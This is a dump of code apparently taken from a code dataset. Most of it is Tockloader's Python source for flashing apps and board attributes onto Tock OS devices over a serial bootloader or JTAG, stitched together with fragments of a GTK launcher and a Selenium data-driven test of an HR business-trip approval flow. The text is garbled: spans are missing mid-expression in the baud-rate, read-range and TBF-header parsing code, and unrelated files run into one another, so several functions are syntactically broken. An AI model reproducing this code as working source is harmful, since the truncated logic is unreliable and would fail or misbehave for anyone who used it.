Must be 55 bytes or fewer.')\n\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\tif not self._bootloader_is_present():\n\t\t\t\traise TockLoaderException('No bootloader found! That means there is nowhere for attributes to go.')\n\n\t\t\t# Create the buffer to write as the attribute\n\t\t\tout = bytes([])\n\t\t\t# Add key\n\t\t\tout += key.encode('utf-8')\n\t\t\tout += bytes([0] * (8-len(out)))\n\t\t\t# Add length\n\t\t\tout += bytes([len(value.encode('utf-8'))])\n\t\t\t# Add value\n\t\t\tout += value.encode('utf-8')\n\n\t\t\t# Find if this attribute key already exists\n\t\t\topen_index = -1\n\t\t\tfor index, attribute in enumerate(self.channel.get_all_attributes()):\n\t\t\t\tif attribute:\n\t\t\t\t\tif attribute['key'] == key:\n\t\t\t\t\t\tprint('Found existing key at slot {}. Overwriting.'.format(index))\n\t\t\t\t\t\tself.channel.set_attribute(index, out)\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\t# Save where we should put this attribute if it does not\n\t\t\t\t\t# already exist.\n\t\t\t\t\tif open_index == -1:\n\t\t\t\t\t\topen_index = index\n\t\t\telse:\n\t\t\t\tif open_index == -1:\n\t\t\t\t\traise TockLoaderException('Error: No open space to save this attribute.')\n\t\t\t\telse:\n\t\t\t\t\tprint('Key not found. Writing new attribute to slot {}'.format(open_index))\n\t\t\t\t\tself.channel.set_attribute(open_index, out)\n\n\n\t# Remove an existing attribute already stored on the board\n\tdef remove_attribute (self, key):\n\t\t# Do some checking\n\t\tif len(key.encode('utf-8')) > 8:\n\t\t\traise TockLoaderException('Key is too long. Must be 8 bytes or fewer.')\n\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\tif not self._bootloader_is_present():\n\t\t\t\traise TockLoaderException('No bootloader found! That means there is nowhere for attributes to go.')\n\n\t\t\t# Create a null buffer to overwrite with\n\t\t\tout = bytes([0]*9)\n\n\t\t\t# Find if this attribute key already exists\n\t\t\tfor index, attribute in enumerate(self.channel.get_all_attributes()):\n\t\t\t\tif attribute and attribute['key'] == key:\n\t\t\t\t\tprint('Found existing key at slot {}. Removing.'.format(index))\n\t\t\t\t\tself.channel.set_attribute(index, out)\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\traise TockLoaderException('Error: Attribute does not exist.')\n\n\n\t# Print all info about this board.\n\tdef info (self, app_address):\n\t\t# Enter bootloader mode to get things started\n\t\twith self._start_communication_with_board():\n\n\t\t\t# Print all apps\n\t\t\tprint('Apps:')\n\t\t\tapps = self._extract_all_app_headers(app_address)\n\t\t\tself._print_apps(apps, True, False)\n\n\t\t\tif self._bootloader_is_present():\n\t\t\t\t# Print all attributes\n\t\t\t\tprint('Attributes:')\n\t\t\t\tattributes = self.channel.get_all_attributes()\n\t\t\t\tself._print_attributes(attributes)\n\t\t\t\tprint('')\n\n\t\t\t\t# Show bootloader version\n\t\t\t\tversion = self.channel.get_bootloader_version()\n\t\t\t\tif version == None:\n\t\t\t\t\tversion = 'unknown'\n\t\t\t\tprint('Bootloader version: {}'.format(version))\n\t\t\telse:\n\t\t\t\tprint('No bootloader.')\n\n\t############################################################################\n\t## Internal Helper Functions for Communicating with Boards\n\t############################################################################\n\n\t# Based on the transport method used, there may be some setup required\n\t# to connect to the board. 
This function runs the setup needed to connect\n\t# to the board. It also times the operation.\n\t#\n\t# For the bootloader, the board needs to be reset and told to enter the\n\t# bootloader mode.\n\t# For JTAG, this is unnecessary.\n\t@contextlib.contextmanager\n\tdef _start_communication_with_board (self):\n\t\t# Time the operation\n\t\tthen = time.time()\n\t\ttry:\n\t\t\tself.channel.enter_bootloader_mode()\n\n\t\t\t# Now that we have connected to the board and the bootloader\n\t\t\t# if necessary, make sure we know what kind of board we are\n\t\t\t# talking to.\n\t\t\tself.channel.determine_current_board()\n\n\t\t\tyield\n\n\t\t\tnow = time.time()\n\t\t\tprint('Finished in {:0.3f} seconds'.format(now-then))\n\t\texcept Exception as e:\n\t\t\traise(e)\n\t\tfinally:\n\t\t\tself.channel.exit_bootloader_mode()\n\n\t# Check if a bootloader exists on this board. It is specified by the\n\t# string \"TOCKBOOTLOADER\" being at address 0x400.\n\tdef _bootloader_is_present (self):\n\t\t# Check to see if the channel already knows this. For example,\n\t\t# if you are connected via a serial link to the bootloader,\n\t\t# then obviously the bootloader is present.\n\t\tif self.channel.bootloader_is_present() == True:\n\t\t\treturn True\n\n\t\t# Otherwise check for the bootloader flag in the flash.\n\n\t\t# Constants for the bootloader flag\n\t\taddress = 0x400\n\t\tlength = 14\n\t\tflag = self.channel.read_range(address, length)\n\t\tflag_str = flag.decode('utf-8')\n\t\tif self.args.debug:\n\t\t\tprint('Read from flags location: {}'.format(flag_str))\n\t\treturn flag_str == 'TOCKBOOTLOADER'\n\n\n\t############################################################################\n\t## Helper Functions for Manipulating Binaries and TBF\n\t############################################################################\n\n\t# Given an array of apps, some of which are new and some of which exist,\n\t# sort them in flash so they are in descending size order.\n\tdef _reshuffle_apps(self, address, apps):\n\t\t# We are given an array of apps. First we need to order them by size.\n\t\tapps.sort(key=lambda x: x['header']['total_size'], reverse=True)\n\n\t\t# Now iterate to see if the address has changed\n\t\tstart_address = address\n\t\tfor app in apps:\n\t\t\t# If the address already matches, then we are good.\n\t\t\t# On to the next app.\n\t\t\tif app['address'] != start_address:\n\t\t\t\t# If they don't, then we need to read the binary out of\n\t\t\t\t# flash and save it to be moved, as well as update the address.\n\t\t\t\t# However, we may have a new binary to use, so we don't need to\n\t\t\t\t# fetch it.\n\t\t\t\tif 'binary' not in app:\n\t\t\t\t\tapp['binary'] = self.channel.read_range(app['address'], app['header']['total_size'])\n\n\t\t\t\t# Either way save the new address.\n\t\t\t\tapp['address'] = start_address\n\n\t\t\tstart_address += app['header']['total_size']\n\n\t\t# Now flash all apps that have a binary field. The presence of the\n\t\t# binary indicates that they are new or moved.\n\t\tend = address\n\t\tfor app in apps:\n\t\t\tif 'binary' in app:\n\t\t\t\tself.channel.flash_binary(app['address'], app['binary'])\n\t\t\tend = app['address'] + app['header']['total_size']\n\n\t\t# Then erase the next page. 
This ensures that flash is clean at the\n\t\t# end of the installed apps and makes things nicer for future uses of\n\t\t# this script.\n\t\tself.channel.erase_page(end)\n\n\t# Iterate through the flash on the board for\n\t# the header information about each app.\n\tdef _extract_all_app_headers (self, address):\n\t\tapps = []\n\n\t\t# Jump through the linked list of apps\n\t\twhile (True):\n\t\t\theader_length = 76 # Version 1\n\t\t\tflash = self.channel.read_range(address, header_length)\n\n\t\t\t# if there was an error, the binary array will be empty\n\t\t\tif len(flash) < header_length:\n\t\t\t\tbreak\n\n\t\t\t# Get all the fields from the header\n\t\t\ttbfh = parse_tbf_header(flash)\n\n\t\t\tif tbfh['valid']:\n\t\t\t\t# Get the name out of the app\n\t\t\t\tname = self._get_app_name(address+tbfh['package_name_offset'], tbfh['package_name_size'])\n\n\t\t\t\tapps.append({\n\t\t\t\t\t'address': address,\n\t\t\t\t\t'header': tbfh,\n\t\t\t\t\t'name': name,\n\t\t\t\t})\n\n\t\t\t\taddress += tbfh['total_size']\n\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\treturn apps\n\n\t# Iterate through the list of TABs and create the app dict for each.\n\tdef _extract_apps_from_tabs (self, tabs):\n\t\tapps = []\n\n\t\t# This is the architecture we need for the board\n\t\tarch = self.channel.get_board_arch()\n\n\t\tfor tab in tabs:\n\t\t\tif self.args.force or tab.is_compatible_with_board(self.channel.get_board_name()):\n\t\t\t\tapps.append(tab.extract_app(arch))\n\n\t\tif len(apps) == 0:\n\t\t\traise TockLoaderException('No valid apps for this board were provided. Use --force to override.')\n\n\t\treturn apps\n\n\t# Retrieve bytes from the board and interpret them as a string\n\tdef _get_app_name (self, address, length):\n\t\tif length == 0:\n\t\t\treturn ''\n\n\t\tname_memory = self.channel.read_range(address, length)\n\t\treturn name_memory.decode('utf-8')\n\n\t# Check if putting an app at this address will be OK with the MPU.\n\tdef _app_is_aligned_correctly (self, address, size):\n\t\t# The rule for the MPU is that the size of the protected region must be\n\t\t# a power of two, and that the region is aligned on a multiple of that\n\t\t# size.\n\n\t\t# Check if not power of two\n\t\tif (size & (size - 1)) != 0:\n\t\t\treturn False\n\n\t\t# Check that address is a multiple of size\n\t\tmultiple = address // size\n\t\tif multiple * size != address:\n\t\t\treturn False\n\n\t\treturn True\n\n\t############################################################################\n\t## Printing helper functions\n\t############################################################################\n\n\t# Print information about a list of apps\n\tdef _print_apps (self, apps, verbose, quiet):\n\t\tif not quiet:\n\t\t\t# Print info about each app\n\t\t\tfor i,app in enumerate(apps):\n\t\t\t\ttbfh = app['header']\n\t\t\t\tstart_address = app['address']\n\n\t\t\t\tprint('[App {}]'.format(i))\n\t\t\t\tprint(' Name: {}'.format(app['name']))\n\t\t\t\tprint(' Total Size in Flash: {} bytes'.format(tbfh['total_size']))\n\n\t\t\t\t# Check if this app is OK with the MPU region requirements.\n\t\t\t\tif not self._app_is_aligned_correctly(start_address, tbfh['total_size']):\n\t\t\t\t\tprint(' [WARNING] App is misaligned for the MPU')\n\n\t\t\t\tif verbose:\n\t\t\t\t\tprint(' Flash Start Address: {:#010x}'.format(start_address))\n\t\t\t\t\tprint(' Flash End Address: {:#010x}'.format(start_address+tbfh['total_size']-1))\n\t\t\t\t\tprint(' Entry Address: {:#010x}'.format(start_address+tbfh['entry_offset']))\n\t\t\t\t\tprint(' Relocate Data Address: 
{:#010x} (length: {} bytes)'.format(start_address+tbfh['rel_data_offset'], tbfh['rel_data_size']))\n\t\t\t\t\tprint('  Text Address: {:#010x} (length: {} bytes)'.format(start_address+tbfh['text_offset'], tbfh['text_size']))\n\t\t\t\t\tprint('  GOT Address: {:#010x} (length: {} bytes)'.format(start_address+tbfh['got_offset'], tbfh['got_size']))\n\t\t\t\t\tprint('  Data Address: {:#010x} (length: {} bytes)'.format(start_address+tbfh['data_offset'], tbfh['data_size']))\n\t\t\t\t\tprint('  Minimum Stack Size: {} bytes'.format(tbfh['min_stack_len']))\n\t\t\t\t\tprint('  Minimum Heap Size: {} bytes'.format(tbfh['min_app_heap_len']))\n\t\t\t\t\tprint('  Minimum Grant Size: {} bytes'.format(tbfh['min_kernel_heap_len']))\n\t\t\t\t\tprint('  Checksum: {:#010x}'.format(tbfh['checksum']))\n\t\t\t\tprint('')\n\n\t\t\tif len(apps) == 0:\n\t\t\t\tprint('No apps found.')\n\n\t\telse:\n\t\t\t# In quiet mode just show the names.\n\t\t\tapp_names = []\n\t\t\tfor app in apps:\n\t\t\t\tapp_names.append(app['name'])\n\t\t\tprint(' '.join(app_names))\n\n\tdef _print_attributes (self, attributes):\n\t\tfor index, attribute in enumerate(attributes):\n\t\t\tif attribute:\n\t\t\t\tprint('{:02d}: {:>8} = {}'.format(index, attribute['key'], attribute['value']))\n\t\t\telse:\n\t\t\t\tprint('{:02d}:'.format(index))\n\n\n################################################################################\n## Connection to the Board Classes\n################################################################################\n\n# Generic template class that allows actually talking to the board\nclass BoardInterface:\n\n\tdef __init__ (self, args):\n\t\tself.args = args\n\n\t\t# These settings need to come from somewhere. One place is the\n\t\t# command line. Another is the attributes section on the board.\n\t\t# There could be more in the future.\n\t\t# Also, not all are required depending on the connection method used.\n\t\tself.board = getattr(self.args, 'board', None)\n\t\tself.arch = getattr(self.args, 'arch', None)\n\t\tself.jtag_device = getattr(self.args, 'jtag_device', None)\n\n\t# Open a connection to the board\n\tdef open_link_to_board (self):\n\t\treturn\n\n\t# Get access to the underlying serial port (if it exists).\n\t# This is used for running miniterm.\n\tdef get_serial_port (self):\n\t\treturn\n\n\t# Get to a mode where we can read & write flash\n\tdef enter_bootloader_mode (self):\n\t\treturn\n\n\t# Get out of bootloader mode and go back to running main code\n\tdef exit_bootloader_mode (self):\n\t\treturn\n\n\t# Write a binary to the address given\n\tdef flash_binary (self, address, binary):\n\t\treturn\n\n\t# Read a specific range of flash.\n\tdef read_range (self, address, length):\n\t\tif self.args.debug:\n\t\t\tprint('DEBUG => Read Range, address: {:#010x}, length: {}'.format(address, length))\n\n\t# Erase a specific page.\n\tdef erase_page (self, address):\n\t\treturn\n\n\t# Get a single attribute.\n\tdef get_attribute (self, index):\n\t\treturn\n\n\t# Get all attributes on a board.\n\tdef get_all_attributes (self):\n\t\treturn\n\n\t# Set a single attribute.\n\tdef set_attribute (self, index, raw):\n\t\treturn\n\n\tdef _decode_attribute (self, raw):\n\t\ttry:\n\t\t\tkey = raw[0:8].decode('utf-8').strip(bytes([0]).decode('utf-8'))\n\t\t\tvlen = raw[8]\n\t\t\tif vlen > 55 or vlen == 0:\n\t\t\t\treturn None\n\t\t\tvalue = raw[9:9+vlen].decode('utf-8')\n\t\t\treturn {\n\t\t\t\t'key': key,\n\t\t\t\t'value': value\n\t\t\t}\n\t\texcept Exception as e:\n\t\t\treturn None\n\n\t# Default answer is to not answer.\n\tdef 
bootloader_is_present (self):\n\t\treturn None\n\n\t# Return the version string of the bootloader.\n\tdef get_bootloader_version (self):\n\t\treturn\n\n\t# Figure out which board we are connected to. Most likely done by\n\t# reading the attributes.\n\tdef determine_current_board (self):\n\t\treturn\n\n\t# Return the name of the board we are connected to.\n\tdef get_board_name (self):\n\t\treturn self.board\n\n\t# Return the architecture of the board we are connected to.\n\tdef get_board_arch (self):\n\t\treturn self.arch\n\n\n################################################################################\n## Bootloader Specific Functions\n################################################################################\n\nclass BootloaderSerial(BoardInterface):\n\n\t# \"This was chosen as it is infrequent in .bin files\" - immesys\n\tESCAPE_CHAR = 0xFC\n\n\t# Commands from this tool to the bootloader.\n\t# The \"X\" commands are for external flash.\n\tCOMMAND_PING = 0x01\n\tCOMMAND_INFO = 0x03\n\tCOMMAND_ID = 0x04\n\tCOMMAND_RESET = 0x05\n\tCOMMAND_ERASE_PAGE = 0x06\n\tCOMMAND_WRITE_PAGE = 0x07\n\tCOMMAND_XEBLOCK = 0x08\n\tCOMMAND_XWPAGE = 0x09\n\tCOMMAND_CRCRX = 0x10\n\tCOMMAND_READ_RANGE = 0x11\n\tCOMMAND_XRRANGE = 0x12\n\tCOMMAND_SET_ATTRIBUTE = 0x13\n\tCOMMAND_GET_ATTRIBUTE = 0x14\n\tCOMMAND_CRC_INTERNAL_FLASH = 0x15\n\tCOMMAND_CRCEF = 0x16\n\tCOMMAND_XEPAGE = 0x17\n\tCOMMAND_XFINIT = 0x18\n\tCOMMAND_CLKOUT = 0x19\n\tCOMMAND_WUSER = 0x20\n\tCOMMAND_CHANGE_BAUD_RATE = 0x21\n\n\t# Responses from the bootloader.\n\tRESPONSE_OVERFLOW = 0x10\n\tRESPONSE_PONG = 0x11\n\tRESPONSE_BADADDR = 0x12\n\tRESPONSE_INTERROR = 0x13\n\tRESPONSE_BADARGS = 0x14\n\tRESPONSE_OK = 0x15\n\tRESPONSE_UNKNOWN = 0x16\n\tRESPONSE_XFTIMEOUT = 0x17\n\tRESPONSE_XFEPE = 0x18\n\tRESPONSE_CRCRX = 0x19\n\tRESPONSE_READ_RANGE = 0x20\n\tRESPONSE_XRRANGE = 0x21\n\tRESPONSE_GET_ATTRIBUTE = 0x22\n\tRESPONSE_CRC_INTERNAL_FLASH = 0x23\n\tRESPONSE_CRCXF = 0x24\n\tRESPONSE_INFO = 0x25\n\tRESPONSE_CHANGE_BAUD_FAIL = 0x26\n\n\t# Tell the bootloader to reset its buffer to handle a new command.\n\tSYNC_MESSAGE = bytes([0x00, 0xFC, 0x05])\n\n\t# Open the serial port to the chip/bootloader\n\tdef open_link_to_board (self):\n\t\t# Check to see if the serial port was specified or we should find\n\t\t# one to use\n\t\tif self.args.port == None:\n\t\t\t# Nothing was specified, so we look for something marked as \"Tock\".\n\t\t\t# If we can't find something, it is OK.\n\t\t\tdevice_name = 'tock'\n\t\t\tmust_match = False\n\t\t\tprint('No device name specified. Using default \"{}\"'.format(device_name))\n\t\telse:\n\t\t\t# Since we specified, make sure we connect to that.\n\t\t\tdevice_name = self.args.port\n\t\t\tmust_match = True\n\n\t\t# Look for a matching port\n\t\tports = list(serial.tools.list_ports.grep(device_name))\n\t\tif len(ports) == 1:\n\t\t\t# Easy case, use the one that matches\n\t\t\tprint('Using \"{}\"'.format(ports[0]))\n\t\t\tindex = 0\n\t\telif len(ports) > 1:\n\t\t\tindex = menu(ports, return_type='index')\n\t\telse:\n\t\t\tif must_match:\n\t\t\t\t# We want to find a very specific board. 
If this does not\n\t\t\t\t# exist, we want to fail.\n\t\t\t\traise TockLoaderException('Could not find a board matching \"{}\"'.format(device_name))\n\n\t\t\t# Just find any port and use the first one\n\t\t\tports = list(serial.tools.list_ports.comports())\n\t\t\t# Macs will report Bluetooth devices with serial, which is\n\t\t\t# almost certainly never what you want, so drop these\n\t\t\tports = [p for p in ports if 'Bluetooth-Incoming-Port' not in p[0]]\n\t\t\tif len(ports) == 0:\n\t\t\t\traise TockLoaderException('No serial ports found. Is the board connected?')\n\n\t\t\tprint('No serial port with device name \"{}\" found'.format(device_name))\n\t\t\tprint('Found {} serial port(s).'.format(len(ports)))\n\n\t\t\tif len(ports) == 1:\n\t\t\t\tprint('Using \"{}\"'.format(ports[0]))\n\t\t\t\tindex = 0\n\t\t\telse:\n\t\t\t\tindex = menu(ports, return_type='index')\n\t\tport = ports[index][0]\n\t\tset_terminal_title_from_port_info(ports[index])\n\n\t\t# Open the actual serial port\n\t\tself.sp = serial.Serial()\n\t\tself.sp.port = port\n\t\tself.sp.baudrate = 115200\n\t\tself.sp.parity=serial.PARITY_NONE\n\t\tself.sp.stopbits=1\n\t\tself.sp.xonxoff=0\n\t\tself.sp.rtscts=0\n\t\tself.sp.timeout=0.5\n\t\t# Try to set initial conditions, but not all platforms support them.\n\t\t# https://github.com/pyserial/pyserial/issues/124#issuecomment-227235402\n\t\tself.sp.dtr = 0\n\t\tself.sp.rts = 0\n\t\tself.sp.open()\n\n\tdef get_serial_port (self):\n\t\treturn self.sp\n\n\t# Reset the chip and assert the bootloader select pin to enter bootloader\n\t# mode.\n\tdef _toggle_bootloader_entry (self):\n\t\t# Reset the SAM4L\n\t\tself.sp.dtr = 1\n\t\t# Set RTS to make the SAM4L go into bootloader mode\n\t\tself.sp.rts = 1\n\t\t# Wait for the reset to take effect\n\t\ttime.sleep(0.1)\n\t\t# Let the SAM4L startup\n\t\tself.sp.dtr = 0\n\t\t# Wait for 500 ms to make sure the bootloader enters bootloader mode\n\t\ttime.sleep(0.5)\n\t\t# The select line can go back high\n\t\tself.sp.rts = 0\n\n\t# Reset the chip and assert the bootloader select pin to enter bootloader\n\t# mode.\n\tdef enter_bootloader_mode (self):\n\t\tself._toggle_bootloader_entry()\n\n\t\t# Make sure the bootloader is actually active and we can talk to it.\n\t\ttry:\n\t\t\tself._ping_bootloader_and_wait_for_response()\n\t\texcept:\n\t\t\ttry:\n\t\t\t\t# Give it another go\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself._toggle_bootloader_entry()\n\t\t\t\tself._ping_bootloader_and_wait_for_response()\n\t\t\texcept:\n\t\t\t\tprint('Error connecting to bootloader. 
No \"pong\" received.')\n\t\t\t\tprint('Things that could be wrong:')\n\t\t\t\tprint(' - The bootloader is not flashed on the chip')\n\t\t\t\tprint(' - The DTR/RTS lines are not working')\n\t\t\t\tprint(' - The serial port being used is incorrect')\n\t\t\t\tprint(' - The bootloader API has changed')\n\t\t\t\tprint(' - There is a bug in this script')\n\t\t\t\traise TockLoaderException('Could not attach to the bootloader')\n\n\t\t# Speculatively try to get a faster baud rate.\n\t\tself._change_baud_rate(self.args.baud_rate)\n\n\t# Reset the chip to exit bootloader mode\n\tdef exit_bootloader_mode (self):\n\t\tif self.args.jtag:\n\t\t\treturn\n\n\t\t# Reset the SAM4L\n\t\tself.sp.dtr = 1\n\t\t# Make sure this line is de-asserted (high)\n\t\tself.sp.rts = 0\n\t\t# Let the reset take effect\n\t\ttime.sleep(0.1)\n\t\t# Let the SAM4L startup\n\t\tself.sp.dtr = 0\n\n\t# Throws an exception if the device does not respond with a PONG\n\tdef _ping_bootloader_and_wait_for_response (self):\n\t\tfor i in range(30):\n\t\t\t# Try to ping the SAM4L to ensure it is in bootloader mode\n\t\t\tping_pkt = bytes([self.ESCAPE_CHAR, self.COMMAND_PING])\n\t\t\tself.sp.write(ping_pkt)\n\n\t\t\t# Read much more than we need in case something got in the\n\t\t\t# serial channel that we need to clear.\n\t\t\tret = self.sp.read(200)\n\n\t\t\tif len(ret) == 2 and ret[1] == self.RESPONSE_PONG:\n\t\t\t\treturn\n\t\traise TockLoaderException('No PONG received')\n\n\t# Setup a command to send to the bootloader and handle the response.\n\tdef _issue_command (self, command, message, sync, response_len, response_code, show_errors=True):\n\t\tif sync:\n\t\t\tself.sp.write(self.SYNC_MESSAGE)\n\t\t\ttime.sleep(0.0001)\n\n\t\t# Generate the message to send to the bootloader\n\t\tescaped_message = message.replace(bytes([self.ESCAPE_CHAR]), bytes([self.ESCAPE_CHAR, self.ESCAPE_CHAR]))\n\t\tpkt = escaped_message + bytes([self.ESCAPE_CHAR, command])\n\t\tself.sp.write(pkt)\n\n\t\t# Response has a two byte header, then response_len bytes\n\t\tret = self.sp.read(2 + response_len)\n\n\t\t# Response is escaped, so we need to handle that\n\t\twhile True:\n\t\t\tnum_escaped = ret.count(bytes([self.ESCAPE_CHAR, self.ESCAPE_CHAR]))\n\t\t\tif num_escaped > 0:\n\t\t\t\t# De-escape, and then read in the missing characters.\n\t\t\t\tret = ret.replace(bytes([self.ESCAPE_CHAR, self.ESCAPE_CHAR]), bytes([self.ESCAPE_CHAR]))\n\t\t\t\tret += self.sp.read(num_escaped)\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\tif len(ret) < 2:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: No response after issuing command')\n\t\t\treturn (False, bytes())\n\n\t\tif ret[0] != self.ESCAPE_CHAR:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: Invalid response from bootloader (no escape character)')\n\t\t\treturn (False, ret[0:2])\n\t\tif ret[1] != response_code:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: Expected return type {:x}, got return {:x}'.format(response_code, ret[1]))\n\t\t\treturn (False, ret[0:2])\n\t\tif len(ret) != 2 + response_len:\n\t\t\tif show_errors:\n\t\t\t\tprint('Error: Incorrect number of bytes received')\n\t\t\treturn (False, ret[0:2])\n\n\t\treturn (True, ret[2:])\n\n\t# If the bootloader on the board supports it and if it succeeds, try\n\t# to increase the baud rate to make everything faster.\n\tdef _change_baud_rate (self, baud_rate):\n\t\tpkt = struct.pack(' 0:\n\t\t\tif remaining > MAX_READ:\n\t\t\t\tthis_length = MAX_READ\n\t\t\t\tremaining -= MAX_READ\n\t\t\telse:\n\t\t\t\tthis_length = remaining\n\t\t\t\tremaining = 0\n\n\t\t\tmessage = struct.pack(' 
length:\n\t\t\tread = read[0:length]\n\n\t\treturn read\n\n\t# Erase a specific page.\n\tdef erase_page (self, address):\n\t\tbinary = bytes([0xFF]*512)\n\t\tcommands = [\n\t\t\t'r',\n\t\t\t'loadbin {{binary}}, {address:#x}'.format(address=address),\n\t\t\t'verifybin {{binary}}, {address:#x}'.format(address=address),\n\t\t\t'r\\ng\\nq'\n\t\t]\n\n\t\tself._run_jtag_commands(commands, binary)\n\n\t# Get a single attribute.\n\tdef get_attribute (self, index):\n\t\taddress = 0x600 + (64 * index)\n\t\tattribute_raw = self.read_range(address, 64)\n\t\treturn self._decode_attribute(attribute_raw)\n\n\tdef get_all_attributes (self):\n\t\t# Read the entire block of attributes using JTAG.\n\t\t# This is much faster.\n\t\tdef chunks(l, n):\n\t\t\tfor i in range(0, len(l), n):\n\t\t\t\tyield l[i:i + n]\n\t\traw = self.read_range(0x600, 64*16)\n\t\treturn [self._decode_attribute(r) for r in chunks(raw, 64)]\n\n\t# Set a single attribute.\n\tdef set_attribute (self, index, raw):\n\t\taddress = 0x600 + (64 * index)\n\t\tself.flash_binary(address, raw)\n\n\tdef get_bootloader_version (self):\n\t\taddress = 0x40E\n\t\tversion_raw = self.read_range(address, 8)\n\t\ttry:\n\t\t\treturn version_raw.decode('utf-8')\n\t\texcept:\n\t\t\treturn None\n\n\tdef get_serial_port (self):\n\t\traise TockLoaderException('No serial port for JLinkExe comm channel')\n\n\t# Figure out which board we are connected to. Most likely done by\n\t# reading the attributes.\n\tdef determine_current_board (self):\n\t\tif self.board and self.arch and self.jtag_device:\n\t\t\t# These are already set! Yay we are done.\n\t\t\treturn\n\n\t\t# The primary (only?) way to do this is to look at attributes\n\t\tattributes = self.get_all_attributes()\n\t\tfor attribute in attributes:\n\t\t\tif attribute and attribute['key'] == 'board' and self.board == None:\n\t\t\t\tself.board = attribute['value']\n\t\t\tif attribute and attribute['key'] == 'arch' and self.arch == None:\n\t\t\t\tself.arch = attribute['value']\n\t\t\tif attribute and attribute['key'] == 'jldevice':\n\t\t\t\tself.jtag_device = attribute['value']\n\n\t\t# Check that we learned what we needed to learn.\n\t\tif self.board == None or self.arch == None or self.jtag_device == 'cortex-m0':\n\t\t\traise TockLoaderException('Could not determine the current board or arch or jtag device name')\n\n\n################################################################################\n## Tock Application Bundle Object\n################################################################################\n\nclass TAB:\n\tdef __init__ (self, tab_name):\n\t\tself.tab = tarfile.open(tab_name)\n\n\tdef extract_app (self, arch):\n\t\tbinary_tarinfo = self.tab.getmember('{}.bin'.format(arch))\n\t\tbinary = self.tab.extractfile(binary_tarinfo).read()\n\n\t\t# First get the TBF header from the correct binary in the TAB\n\t\ttbfh = parse_tbf_header(binary)\n\n\t\tif tbfh['valid']:\n\t\t\tstart = tbfh['package_name_offset']\n\t\t\tend = start+tbfh['package_name_size']\n\t\t\tname = binary[start:end].decode('utf-8')\n\n\t\t\treturn {\n\t\t\t\t'address': None,\n\t\t\t\t'header': tbfh,\n\t\t\t\t'name': name,\n\t\t\t\t'binary': binary,\n\t\t\t}\n\t\telse:\n\t\t\traise TockLoaderException('Invalid TBF found in app in TAB')\n\n\tdef is_compatible_with_board (self, board):\n\t\tmetadata = self.parse_metadata()\n\t\tif metadata['tab-version'] == 1:\n\t\t\treturn 'only-for-boards' not in metadata or \\\n\t\t\t board in metadata['only-for-boards'] or \\\n\t\t\t metadata['only-for-boards'] == 
''\n\t\telse:\n\t\t\traise TockLoaderException('Unable to understand version {} of metadata'.format(metadata['tab-version']))\n\n\tdef parse_metadata (self):\n\t\tmetadata_tarinfo = self.tab.getmember('metadata.toml')\n\t\tmetadata_str = self.tab.extractfile(metadata_tarinfo).read().decode('utf-8')\n\t\treturn pytoml.loads(metadata_str)\n\n\tdef get_supported_architectures (self):\n\t\tcontained_files = self.tab.getnames()\n\t\treturn [i[:-4] for i in contained_files if i[-4:] == '.bin']\n\n\tdef get_tbf_header (self):\n\t\t# Find a .bin file\n\t\tfor f in self.tab.getnames():\n\t\t\tif f[-4:] == '.bin':\n\t\t\t\tbinary_tarinfo = self.tab.getmember(f)\n\t\t\t\tbinary = self.tab.extractfile(binary_tarinfo).read()\n\n\t\t\t\t# Get the TBF header from a binary in the TAB\n\t\t\t\treturn parse_tbf_header(binary)\n\t\treturn {}\n\n\n################################################################################\n## General Purpose Helper Functions\n################################################################################\n\n# Parses a buffer into the Tock Binary Format header fields\ndef parse_tbf_header (buffer):\n\tout = {'valid': False}\n\n\t# Read first word to get the TBF version\n\tout['version'] = struct.unpack(' Variáveis globais\n\nui.connect_signals(Handler())\nwindow = ui.get_object(\"jn_a\")\nwindow.show_all()\n\nif __name__ == '__main__':\n Gtk.main()\n\n","sub_path":"util/codigo_base.py","file_name":"codigo_base.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"651324945","text":"import xlrd\nimport ddt\nimport unittest\nfrom time import sleep\nfrom loginPage import LoginPage\nfrom todoApplyPage import TodoApplyPage\nfrom selenium import webdriver\nimport os\nimport HTMLTestRunner\n\ndef get_test_data(path, sheetname):\n book = xlrd.open_workbook(path)\n sheet = book.sheet_by_name(sheetname)\n nrows = sheet.nrows\n data = []\n\n if nrows > 1:\n for r in range(1, nrows):\n user = {}\n user['name'] = []\n user['username'] = []\n for c in range (0, 13, 2):\n user['name'].append(sheet.cell_value(r, c))\n user['username'].append(sheet.cell_value(r, c+1))\n user['reason'] = sheet.cell_value(r, 14)\n user['start_time'] = sheet.cell_value(r, 15)\n user['end_time'] = sheet.cell_value(r, 16)\n user['place'] = sheet.cell_value(r, 17)\n data.append(user)\n return data\n else:\n return 0\n\npath = os.path.join(os.getcwd(),\"testData\\\\HRMS.xlsx\")\nsheetname = '出差'\n# sheetname = '出差' # 需要乘坐飞机\n\n@ddt.ddt\nclass TestBusiness(unittest.TestCase):\n\n def setUp(self):\n print(\"开始测试\")\n self.driver = webdriver.Chrome()\n self.driver.maximize_window()\n\n @ddt.data(*get_test_data(path, sheetname))\n def test_overtime(self, user):\n # 把已读取的数据信息赋值给变量\n name = user['name']\n username = user['username']\n reason = str(user['reason'])\n start_time = str(user['start_time'])\n end_time = str(user['end_time'])\n place = str(user['place'])\n\n # 初始化\n login_test = LoginPage(self.driver)\n apply_test = TodoApplyPage(self.driver)\n # 标志位,判断走申请流程还是审批流程\n flag = 0\n for n in range(0, 7):\n login_test.open()\n login_test.login(username[n])\n # 申请流程\n if not flag:\n print(\"申请人:\", username[n], name[n])\n apply_test.shadow_click()\n # 不要要乘坐飞机\n apply_test.apply_business(start_time, end_time, place, reason)\n # 需要乘坐飞机\n # apply_test.apply_business_need_plane(start_time, end_time, place, reason)\n apply_test.next_processer(name[n+1])\n apply_test.logout()\n flag += 1\n sleep(1)\n # 审批流程\n else:\n print(\"审批人\"+str(n)+\":\", 